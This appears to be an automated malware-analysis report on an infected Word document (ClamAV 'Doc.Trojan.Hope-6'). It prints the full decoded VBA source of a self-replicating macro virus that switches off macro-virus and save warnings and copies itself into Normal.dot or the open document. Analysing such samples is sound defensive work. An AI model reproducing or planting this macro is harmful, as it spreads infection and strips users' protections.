Verdict: MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to infect other documents. The macro disables user prompts and conversion warnings to ensure its code is copied to the Normal.dot template or the active document. The ClamAV detection name 'Doc.Trojan.Hope-6' further confirms its malicious nature.
Heuristics (3)
- ClamAV: Doc.Trojan.Hope-6 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Hope-6
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2035 bytes |

SHA-256: e42d52b39e7638c94756e7c2dfa029544d8eb051f8fd135e9b3b98c5cbe902ed
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'// The Following Is A Simple Class
'// Virus. This Was Written To Help
'// Explain The Basics Of A Word 97
'// Class Module Virus. This Does
'// Not Go Into The Theory Of Class
'// Infection But Instead Comments
'// On The Technique Used In This
'// Example.
Private Sub Document_Open()
'// This Hooks The Document Open And Will
'// Run The Code Between The Sub/End Sub
Application.EnableCancelKey = wdCancelDisabled
'// This Prevents The User From Stoping
'// Macro Execution
Options.ConfirmConversions = Yes
'// This Disables Document Conversion
'// Warning... Yes = 0 = False
Options.SaveNormalPrompt = Yes
'// This Disables The Save Changes
'// Warning For The NormalTemplate
'// Again Yes = 0 = False
Options.VirusProtection = Yes
'// Disables Macro Warning
'// Yes = 0 = False
If ThisDocument = ActiveDocument Then Set Target = NormalTemplate Else Set Target = ActiveDocument
'// This Sets The Target To Infect
I = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
'// This Creates The String 'I' To Equal
'// The Viral Code
Set Destination = Target.VBProject.VBComponents.Item(1).CodeModule
'// This Sets The 'Destination' To Which
'// The Virus Will Use To Clear And Infect
Destination.DeleteLines 1, Destination.CountOfLines
'// This Clears The Target Destination
'// So That The Virus Will Have A Clean
'// Module To Infect
Destination.AddFromString I
'// This Adds The Virus Code To The
'// Destination
If Target = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'// If The Target Is The ActiveDocument
'// It Will Save The Changes The Virus
'// Made
End Sub
'// This Ends The Document_Open Sub
```